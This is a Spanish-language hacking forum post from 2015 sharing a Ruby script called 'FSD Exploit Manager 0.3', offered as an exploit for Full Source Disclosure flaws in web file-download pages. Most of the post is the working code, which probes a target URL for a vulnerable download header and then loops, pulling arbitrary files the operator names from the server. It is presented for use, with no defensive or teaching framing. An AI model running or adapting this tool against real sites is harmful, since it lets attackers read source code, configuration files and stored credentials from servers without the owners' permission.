comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Ruby] FSD Exploit Manager 0.3

  • 0 Respuestas
  • 1049 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Septiembre 04, 2015, 06:00:13 pm »
Un simple script en Ruby que sirve como exploit para la vulnerabilidad Full Source Discloure.

El codigo :

Código: Ruby
  1. #!usr/bin/ruby
  2. #FSD Exploit Manager 0.3
  3.  
  4. require "open-uri"
  5. require "net/http"  
  6.  
  7. # Functions
  8.  
  9. def toma(web)
  10.         begin
  11.                 return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  12.         rescue
  13.                 return "Error"
  14.         end
  15. end
  16.  
  17. def uso
  18.         print "\n[+] Sintax : ruby locateip.rb <target>\n"
  19. end
  20.  
  21. def  head
  22.         print "\n\n-- == FSD Exploit Manager 0.3 == --\n\n"
  23. end
  24.  
  25. def copyright
  26.         print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  27.         exit(1)
  28. end
  29.  
  30. def installer
  31.         if not Dir.exists?("logs")
  32.                 Dir.mkdir "logs"
  33.         end
  34.         Dir.chdir("logs")
  35. end
  36.  
  37. def download(file,name)
  38.         File.open(name, "wb") do |saved_file|
  39.                 open(file, "rb") do |read_file|
  40.                         saved_file.write(read_file.read)
  41.                 end
  42.         end
  43. end
  44.  
  45. def scan_fsd(target)
  46.         print "\n[+] Scanning ...\n\n"
  47.         path = File.basename(URI(target).path)
  48.         code = toma(target+path)
  49.         if code=~/header\((.*)Content-Disposition: attachment;/
  50.                 print "[+] Vulnerable !\n"
  51.                 while(1)
  52.                         print "\n[+] Insert Filename : "
  53.                         filename = STDIN.gets.chomp
  54.                         if filename=="exit"
  55.                                 copyright()
  56.                         else
  57.                                 download(target+filename,filename)
  58.                                 print "\n[+] Downloaded !\n"
  59.                         end
  60.                 end
  61.                
  62.         else
  63.                 print "[-] Not vulnerable\n"
  64.         end
  65. end
  66.  
  67. target = ARGV[0]
  68.  
  69. installer()
  70.  
  71. head()
  72.  
  73. if !target
  74.         uso()
  75. else
  76.         scan_fsd(target)
  77. end
  78.  
  79. copyright()
  80.  
  81. #The End ?
  82.  

Eso es todo.

 

¿Te gustó el post? COMPARTILO!



[Ruby] Traductor de Decimal a Ascii / Ascii a Decimal

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1402
Último mensaje Febrero 24, 2010, 04:16:38 pm
por ANTRAX
Lenguaje Ruby, aprendiendo poco a poco.

Iniciado por Alejandro9999

Respuestas: 2
Vistas: 1378
Último mensaje Agosto 15, 2013, 02:58:39 pm
por Alejandro9999
Crafting rails 4 applications (Manual de Ruby on Rails 4)

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 866
Último mensaje Marzo 01, 2014, 05:34:50 pm
por Alejandro9999
Desarrollo de aplicaciones Perl, PHP, Python y "Ruby on Rails"

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 1099
Último mensaje Junio 13, 2014, 03:27:08 pm
por Alejandro9999
Como Instalar RubyMine y Crear un proyecto vacio para Ruby y Rails

Iniciado por Alejandro9999

Respuestas: 0
Vistas: 1583
Último mensaje Julio 07, 2013, 10:51:08 pm
por Alejandro9999